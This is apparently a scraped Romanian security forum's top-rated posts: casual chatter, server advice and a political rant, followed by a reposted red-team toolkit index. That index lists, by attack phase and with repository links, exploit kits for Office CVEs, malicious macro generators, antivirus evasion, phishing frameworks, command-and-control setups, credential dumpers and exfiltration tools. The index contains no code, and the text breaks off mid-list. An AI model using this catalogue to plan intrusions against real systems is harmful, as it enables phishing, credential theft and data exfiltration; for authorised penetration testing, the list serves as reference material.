    Sfatul meu este sa lasi magariile la o parte . Ps : la următorul avertisment , ai ban definitiv pe forum .
  19. 3 points
    Bag pula in php 7.3. Dupa cum stiti, aseara au fost niste probleme. Inca sunt, a trebuit sa dezactivez "Friendly URLs" ca sa mearga si va merge temporar.
  20. 3 points
    Orice server are o limita de trafic, iar 2-300 de vizitatori concurenti e semnificativ. In principiu, pentru fiecare vizitator este deschis un proces separat care ruleaza codul tau. Evident, numarul total de procese este limitat de server. Solutiile ar fi: - Incerci sa optimizezi codul actual sau adaugi caching oriunde poti ca sa reduci din resursele folosite; - Schimbi server-ul cu altul cu mai multe resurse sau adaugi resurse la cel pe care-l ai acum; - Adaugi un alt server si implementezi load balancing. Daca nu te pricepi la astea, cauti pe cineva care se pricepe.
  21. 3 points
    Orice turist in orice tara este ignorant (si asa e normal, cand vrei sa te distrezi sau sa te odihnesti) in privinta lucrurilor care conteaza in fiecare zi; aportul la politica, certurile intre vecinii de bloc sau pe locurile de parcare, jegul de pe strazi, problemele de deszapezire, gropile de pe drumuri in care-ti rupi masina, meltenimul oamenilor de la orase, etc. Turistii vad ce vor sa vada, adica statiunile turistice, unde sunt intampinati majoritar de persoane care inteleg cel putin limba engleza si care isi castiga painea din a le sta la dispozitie. Deci a spune ca turistii viziteaza anumite tari pentru ca "stiu ei ceva" ce locuitorii nu stiu, implicand faptul ca ei stiu mai bine, e o aberatie. Te contrazici ridicand tara in slavi si judecand locuitorii in acelasi timp. Ce relevanta are o tara, orice tara, daca e populata de persoane subdezvoltate intelectual? Cand vizitezi o tara, ai aport la o intreaga societate, nu doar la formele de relief. Si cred ca e timpul sa renuntam la argumentul ca tara asta e frumoasa ca fiind argumentul suprem s-o vizitezi. Nu e singura tara cu obiective turistice sau istorie bogata. Nu exista tara fara probleme, nu inteleg de ce ai impresia ca cineva ar incerca sa convinga pe altcineva despre asa ceva. Problemele majore constau insa in faptul ca te lovesti de aceleasi probleme de acum cateva zeci de ani si in ziua de azi, de cateva ori pe zi. Poate functionarii bagpulisti pe tine nu te deranjeaza, sau faptul ca oamenii intra in spitale cu o boala si ies cu altele, sau faptul ca inca se cumpara voturi cu un kilogram de zahar si un litru de ulei, sau rata analfabetismului in crestere, sau faptul ca majoritatea sistemelor de stat care au relatii cu publicul functioneaza analogic, sau nepotismul din politica, sau faptul ca se cheltuie 200m € pe o catedrala. De catre cine? ---------- Daca sunteti in stare sa detectati un tipar in randul celor care critica tara, de ce nu va duceti mai departe sa investigati si de ce? Va opriti in a-i critica inapoi pe ei care critica tara, numai ca ignorati tot si va concentrati pe un argument sau doua, pe un detaliu minor care v-a calcat pe voi personal pe coada, cum e cel despre drumurile tarii. Trebuie sa intelegeti ca cei care au ceva cu tara asta incat sa se incumete sa plece sau chiar cei care o urasc chiar daca inca locuiesc aici, au mai multe motive, nu doar unul. Este irelevant sa va strofocati 2 pagini pe aici sa discutati despre drumurile tarii. In plus, va incadrati la niste aberatii de toata frumusetea, precum: ad hominem si generalizarea pripita, iar daca aveti pretentia sa pretindeti ca stiti ceva in viata asta, asa ceva trebuie sa va dispara din dialog. Apropo de drumuri, de contractul cu Bechtel care "ne-au dat teapa de un miliard de euro cu o autostrada", stiti? Avem bani sa construim autostrazi cu americanii aparent. Statul nostru nu a fost in stare sa rezolve problemele de birocratie la timp, asa ca Bechtel i-a penalizat pentru intarzieri pana cand statul n-a mai fost in stare sa le plateasca penalitatile si a reziliat contractul, cel mai probabil contra unei alte sume de bani, evident. Asa ca nu va mai ganditi ca nu avem autostrazi pentru ca nu avem bani, ganditi-va ca suntem atat de inapti pe plan politic incat nu suntem in stare sa facem loc de o autostrada. Citez, "At present the A3 motorway is one of the most expensive roads in history, having cost the Romanian government $1.5bn for 52km of partially completed carriageway.". Evident, este inutilizabila si in prezent.
  22. 2 points
    Da, exista un numar de subiecte, care sunt scrise sau selectate de catre o comisie a ministerului in Bucuresti. Nu e 100% clar cand sunt selectate aceste 10-20 variante dar, in dimineata examenului este ales un biletel dintr-un bol. Subiectul ales(din bol) e trimis la toate scolile in dimineata examenului cu apx 1-2h inainte, intr-o arhiva zip cu parola! (este un site al ministerului unde fiecare scoala are un cont si are acces la arhiva PAROLATA)! Cu 15 min inaintea examenului PAROLA arhivei este publicata. Astfel scolile pot dezarhiva si printa subiectele. Simularea oficiala urmeaza cam aceleasi reguli. Simularea nu e doar simulare pentru prostanii de copii ci si pentru profesori, directori si informaticienti, ca sa invete si ei cum sa dezarhiveze, descarce, printeze, distribuie, etc. Eu am fost personal parte din sistemul asta, unde am dezarhivat cu parola si am dat print la subiecte.
  23. 2 points
    Sveratus, tot pe aici misuni oratanie? La fel de prost ai ramas
  24. 2 points
  25. 2 points
    Telefonul e stricat, iti iei altul.
  26. 2 points
    Ba astia care va aud cu inchiderea Facebook voi sunteti prosti sa mor eu, cum cacat sa se inchida un business cotat asa de sus, care se extinde si in zone precum VR sau pula mea mai stie unde. In cel mai rau caz transforma jegul asta de network in alt ceva, dar sa dispara din senin nu se va intampla, sunt interese prea mari.
  27. 2 points
    This tool kit is very much influenced by infosecn1nja's kit. Use this script to grab majority of the repos. NOTE: hard coded in /opt and made for Kali Linux Total Size (so far): 2.5G Contents Reconnaissance Weaponization Delivery Command and Control Lateral Movement Establish Foothold Escalate Privileges Data Exfiltration Misc References Reconnaissance Active Intelligence Gathering EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon Passive Intelligence Gathering Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer ScrapedIn a tool to scrape LinkedIn without API restrictions for data reconnaissance. https://github.com/dchrastil/ScrapedIn linkScrape A LinkedIn user/company enumeration tool. https://github.com/NickSanzotta/linkScrape FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil SimplyEmail Email recon made fast and easy, with a framework to build on. https://github.com/killswitch-GUI/SimplyEmail truffleHog searches through git repositories for secrets, digging deep into commit history and branches. https://github.com/dxa4481/truffleHog Just-Metadata is a tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset. https://github.com/ChrisTruncer/Just-Metadata typofinder a finder of domain typos showing country of IP address. https://github.com/nccgroup/typofinder pwnedOrNot is a python script which checks if the email account has been compromised in a data breach, if the email account is compromised it proceeds to find passwords for the compromised account. https://github.com/thewhiteh4t/pwnedOrNot GitHarvester This tool is used for harvesting information from GitHub like google dork. https://github.com/metac0rtex/GitHarvester Frameworks Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. https://www.paterva.com/web7/downloads.php SpiderFoot the open source footprinting and intelligence-gathering tool. https://github.com/smicallef/spiderfoot datasploit is an OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats. https://github.com/DataSploit/datasploit Recon-ng is a full-featured Web Reconnaissance framework written in Python. https://bitbucket.org/LaNMaSteR53/recon-ng Weaponization Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570 Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759 CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882 Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878 Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199 demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism. https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. https://www.shellterproject.com/ EmbedInHTML Embed and hide any file in an HTML file. https://github.com/Arno0x/EmbedInHTML SigThief Stealing Signatures and Making One Invalid Signature at a Time. https://github.com/secretsquirrel/SigThief Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/Veil-Framework/Veil CheckPlease Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust. https://github.com/Arvanaghi/CheckPlease Invoke-PSImage is a tool to embeded a PowerShell script in the pixels of a PNG file and generates a oneliner to execute. https://github.com/peewpw/Invoke-PSImage LuckyStrike a PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only. https://github.com/curi0usJack/luckystrike ClickOnceGenerator Quick Malicious ClickOnceGenerator for Red Team. The default application a simple WebBrowser widget that point to a website of your choice. https://github.com/Mr-Un1k0d3r/ClickOnceGenerator macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of MS Office documents, VB scripts, and other formats for pentest, demo, and social engineering assessments. https://github.com/sevagas/macro_pack StarFighters a JavaScript and VBScript Based Empire Launcher. https://github.com/Cn33liz/StarFighters nps_payload this script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. https://github.com/trustedsec/nps_payload SocialEngineeringPayloads a collection of social engineering tricks and payloads being used for credential theft and spear phishing attacks. https://github.com/bhdresh/SocialEngineeringPayloads The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. https://github.com/trustedsec/social-engineer-toolkit Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. https://github.com/ryhanson/phishery PowerShdll run PowerShell with rundll32. Bypass software restrictions. https://github.com/p3nt4/PowerShdll Ultimate AppLocker ByPass List The goal of this repository is to document the most common techniques to bypass AppLocker. https://github.com/api0cradle/UltimateAppLockerByPassList Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. https://github.com/sensepost/ruler Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. https://github.com/enigma0x3/Generate-Macro Malicious Macro MSBuild Generator Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. https://github.com/infosecn1nja/MaliciousMacroMSBuild Meta Twin is designed as a file resource cloner. Metadata, including digital signature, is extracted from one file and injected into another. https://github.com/threatexpress/metatwin WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software. https://github.com/mwrlabs/wePWNise DotNetToJScript a tool to create a JScript file which loads a .NET v2 assembly from memory. https://github.com/tyranid/DotNetToJScript PSAmsi is a tool for auditing and defeating AMSI signatures. https://github.com/cobbr/PSAmsi Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. https://github.com/stephenfewer/ReflectiveDLLInjection ps1encode use to generate and encode a powershell based metasploit payloads. https://github.com/CroweCybersecurity/ps1encode Worse PDF turn a normal PDF file into malicious. Use to steal Net-NTLM Hashes from windows machines. https://github.com/3gstudent/Worse-PDF SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. https://github.com/hlldz/SpookFlare GreatSCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. https://github.com/GreatSCT/GreatSCT nps running powershell without powershell. https://github.com/Ben0xA/nps Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to. https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. https://github.com/secretsquirrel/the-backdoor-factory MacroShop a collection of scripts to aid in delivering payloads via Office Macros. https://github.com/khr0x40sh/MacroShop UnmanagedPowerShell Executes PowerShell from an unmanaged process. https://github.com/leechristensen/UnmanagedPowerShell evil-ssdp Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page. https://gitlab.com/initstring/evil-ssdp Ebowla Framework for Making Environmental Keyed Payloads. https://github.com/Genetic-Malware/Ebowla make-pdf-embedded a tool to create a PDF document with an embedded file. https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py avet (AntiVirusEvasionTool) is targeting windows machines with executable files using different evasion techniques. https://github.com/govolution/avet Delivery Phishing King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. https://github.com/securestate/king-phisher FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. https://github.com/Raikia/FiercePhish ReelPhish is a Real-Time Two-Factor Phishing Tool. https://github.com/fireeye/ReelPhish/ Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. https://github.com/gophish/gophish CredSniper is a phishing framework written with the Python micro-framework Flask and Jinja2 templating which supports capturing 2FA tokens. https://github.com/ustayready/CredSniper PwnAuth a web application framework for launching and managing OAuth abuse campaigns. https://github.com/fireeye/PwnAuth Phishing Frenzy Ruby on Rails Phishing Framework. https://github.com/pentestgeek/phishing-frenzy Phishing Pretexts a library of pretexts to use on offensive phishing engagements. https://github.com/L4bF0x/PhishingPretexts *Modlishka is a flexible and powerful reverse proxy, that will take your ethical phishing campaigns to the next level. https://github.com/drk1wi/Modlishka Watering Hole Attack BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. https://github.com/beefproject/beef Command and Control Remote Access Tools Cobalt Strike is software for Adversary Simulations and Red Team Operations. https://cobaltstrike.com/ Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. https://github.com/EmpireProject/Empire Metasploit Framework is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. https://github.com/rapid7/metasploit-framework SILENTTRINITY A post-exploitation agent powered by Python, IronPython, C#/.NET. https://github.com/byt3bl33d3r/SILENTTRINITY Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python. https://github.com/n1nj4sec/pupy Koadic or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. https://github.com/zerosum0x0/koadic PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. https://github.com/nettitude/PoshC2 Gcat a stealthy Python based backdoor that uses Gmail as a command and control server. https://github.com/byt3bl33d3r/gcat TrevorC2 is a legitimate website (browsable) that tunnels client/server communications for covert command execution. https://github.com/trustedsec/trevorc2 Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang. https://github.com/Ne0nd0g/merlin Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you. https://github.com/quasar/QuasarRAT Staging Rapid Attack Infrastructure (RAI) Red Team Infrastructure... Quick... Fast... Simplified One of the most tedious phases of a Red Team Operation is usually the infrastructure setup. This usually entails a teamserver or controller, domains, redirectors, and a Phishing server. https://github.com/obscuritylabs/RAI Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams. https://github.com/byt3bl33d3r/Red-Baron EvilURL generate unicode evil domains for IDN Homograph Attack and detect them. https://github.com/UndeadSec/EvilURL Domain Hunter checks expired domains, bluecoat categorization, and Archive.org history to determine good candidates for phishing and C2 domain names. https://github.com/threatexpress/domainhunter PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. https://github.com/mdsecactivebreach/PowerDNS Chameleon a tool for evading Proxy categorisation. https://github.com/mdsecactivebreach/Chameleon CatMyFish Search for categorized domain that can be used during red teaming engagement. Perfect to setup whitelisted domain for your Cobalt Strike beacon C&C. https://github.com/Mr-Un1k0d3r/CatMyFish Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. https://github.com/rsmudge/Malleable-C2-Profiles Malleable-C2-Randomizer This script randomizes Cobalt Strike Malleable C2 profiles through the use of a metalanguage, hopefully reducing the chances of flagging signature-based detection controls. https://github.com/bluscreenofjeff/Malleable-C2-Randomizer FindFrontableDomains search for potential frontable domains. https://github.com/rvrsh3ll/FindFrontableDomains Postfix-Server-Setup Setting up a phishing server is a very long and tedious process. It can take hours to setup, and can be compromised in minutes. https://github.com/n0pe-sled/Postfix-Server-Setup DomainFrontingLists a list of Domain Frontable Domains by CDN. https://github.com/vysec/DomainFrontingLists Apache2-Mod-Rewrite-Setup Quickly Implement Mod-Rewrite in your infastructure. https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup mod_rewrite rule to evade vendor sandboxes. https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10 external_c2 framework a python framework for usage with Cobalt Strike's External C2. https://github.com/Und3rf10w/external_c2_framework ExternalC2 a library for integrating communication channels with the Cobalt Strike External C2 server. https://github.com/ryhanson/ExternalC2 cs2modrewrite a tools for convert Cobalt Strike profiles to modrewrite scripts. https://github.com/threatexpress/cs2modrewrite e2modrewrite a tools for convert Empire profiles to Apache modrewrite scripts. https://github.com/infosecn1nja/e2modrewrite redi automated script for setting up CobaltStrike redirectors (nginx reverse proxy, letsencrypt). https://github.com/taherio/redi Domain Fronting Google App Engine. https://github.com/redteam-cyberark/Google-Domain-fronting DomainFrontDiscover Scripts and results for finding domain frontable CloudFront domains. https://github.com/peewpw/DomainFrontDiscover Automated Empire Infrastructure https://github.com/bneg/RedTeam-Automation Serving Random Payloads with NGINX. https://gist.github.com/jivoi/a33ace2e25515a31aa2ffbae246d98c9 meek is a blocking-resistant pluggable transport for Tor. It encodes a data stream as a sequence of HTTPS requests and responses. https://github.com/arlolra/meek CobaltStrike-ToolKit Some useful scripts for CobaltStrike. https://github.com/killswitch-GUI/CobaltStrike-ToolKit mkhtaccess_red Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload. https://github.com/violentlydave/mkhtaccess_red RedFile a flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads. https://github.com/outflanknl/RedFile keyserver Easily serve HTTP and DNS keys for proper payload protection. https://github.com/leoloobeek/keyserver DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com). https://github.com/SpiderLabs/DoHC2 Lateral Movement CrackMapExec is a swiss army knife for pentesting networks. https://github.com/byt3bl33d3r/CrackMapExec PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. https://github.com/Mr-Un1k0d3r/PowerLessShell GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application. https://github.com/GoFetchAD/GoFetch ANGRYPUPPY a bloodhound attack path automation in CobaltStrike. https://github.com/vysec/ANGRYPUPPY DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar SharpHound C# Rewrite of the BloodHound Ingestor. https://github.com/BloodHoundAD/SharpHound BloodHound.py is a Python based ingestor for BloodHound, based on Impacket. https://github.com/fox-it/BloodHound.py Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. https://github.com/SpiderLabs/Responder SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally. https://github.com/fireeye/SessionGopher PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. https://github.com/PowerShellMafia/PowerSploit Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. https://github.com/samratashok/nishang Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. https://github.com/Kevin-Robertson/Inveigh PowerUpSQL a PowerShell Toolkit for Attacking SQL Server. https://github.com/NetSPI/PowerUpSQL MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). https://github.com/dafthack/MailSniper WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. It's designed primarily for use on penetration tests or red team engagements. https://github.com/ChrisTruncer/WMIOps Mimikatz is an open-source utility that enables the viewing of credential information from the Windows lsass. https://github.com/gentilkiwi/mimikatz LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. https://github.com/AlessandroZ/LaZagne mimipenguin a tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. https://github.com/huntergregal/mimipenguin PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec KeeThief allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system. https://github.com/HarmJ0y/KeeThief PSAttack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. https://github.com/jaredhaight/PSAttack Internal Monologue Attack Retrieving NTLM Hashes without Touching LSASS. https://github.com/eladshamir/Internal-Monologue Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. https://github.com/CoreSecurity/impacket icebreaker gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment. https://github.com/DanMcInerney/icebreaker Living Off The Land Binaries and Scripts (and now also Libraries) The goal of these lists are to document every binary, script and library that can be used for other purposes than they are designed to. https://github.com/api0cradle/LOLBAS WSUSpendu for compromised WSUS server to extend the compromise to clients. https://github.com/AlsidOfficial/WSUSpendu Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. https://github.com/infobyte/evilgrade NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper LethalHTA Lateral Movement technique using DCOM and HTA. https://github.com/codewhitesec/LethalHTA Invoke-PowerThIEf an Internet Explorer Post Exploitation library. https://github.com/nettitude/Invoke-PowerThIEf RedSnarf is a pen-testing / red-teaming tool for Windows environments. https://github.com/nccgroup/redsnarf HoneypotBuster Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host. https://github.com/JavelinNetworks/HoneypotBuster Establish Foothold Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. https://github.com/SECFORCE/Tunna reGeorg the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. https://github.com/sensepost/reGeorg Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper. https://github.com/wonderqs/Blade TinyShell Web Shell Framework. https://github.com/threatexpress/tinyshell PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. https://github.com/Sw4mpf0x/PowerLurk DAMP The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification. https://github.com/HarmJ0y/DAMP Escalate Privileges Domain Escalation PowerView is a PowerShell tool to gain network situational awareness on Windows domains. https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 Get-GPPPassword Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured. https://github.com/fox-it/Invoke-ACLPwn BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. https://github.com/BloodHoundAD/BloodHound PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek Grouper a PowerShell script for helping to find vulnerable settings in AD Group Policy. https://github.com/l0ss/Grouper ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis. https://github.com/sense-of-security/ADRecon ADACLScanner one script for ACL's in Active Directory. https://github.com/canix1/ADACLScanner LAPSToolkit a tool to audit and attack LAPS environments. https://github.com/leoloobeek/LAPSToolkit PingCastle is a free, Windows-based utility to audit the risk level of your AD infrastructure and check for vulnerable practices. https://www.pingcastle.com/download RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). https://github.com/cyberark/RiskySPN Mystique is a PowerShell tool to play with Kerberos S4U extensions, this module can assist blue teams to identify risky Kerberos delegation configurations as well as red teams to impersonate arbitrary users by leveraging KCD with Protocol Transition. https://github.com/machosec/Mystique Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project. https://github.com/GhostPack/Rubeus kekeo is a little toolbox I have started to manipulate Microsoft Kerberos in C (and for fun). https://github.com/gentilkiwi/kekeo Local Escalation UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. https://github.com/hfiref0x/UACME windows-kernel-exploits a collection windows kernel exploit. https://github.com/SecWiki/windows-kernel-exploits PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload. https://github.com/rsmudge/ElevateKit Sherlock a powerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. https://github.com/rasta-mouse/Sherlock Tokenvator a tool to elevate privilege with Windows Tokens. https://github.com/0xbadjuju/Tokenvator Data Exfiltration CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of Analysts; Defeat Data Whitelisting Controls; Evade AV Detection. https://github.com/TryCatchHCF/Cloakify DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. https://github.com/sensepost/DET DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. https://github.com/Arno0x/DNSExfiltrator PyExfil a Python Package for Data Exfiltration. https://github.com/ytisf/PyExfil Egress-Assess is a tool used to test egress data detection capabilities. https://github.com/ChrisTruncer/Egress-Assess Powershell RAT python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. https://github.com/Viralmaniar/Powershell-RAT Misc Wireless Networks Wifiphisher is a security tool that performs Wi-Fi automatic association attacks to force wireless clients to unknowingly connect to an attacker-controlled Access Point. https://github.com/wifiphisher/wifiphisher Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. https://github.com/kgretzky/evilginx mana toolkit for wifi rogue AP attacks and MitM. https://github.com/sensepost/mana Embedded & Peripheral Devices Hacking magspoof a portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. https://github.com/samyk/magspoof WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. https://github.com/secgroundzero/warberry P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). https://github.com/mame82/P4wnP1 malusb HID spoofing multi-OS payload for Teensy. 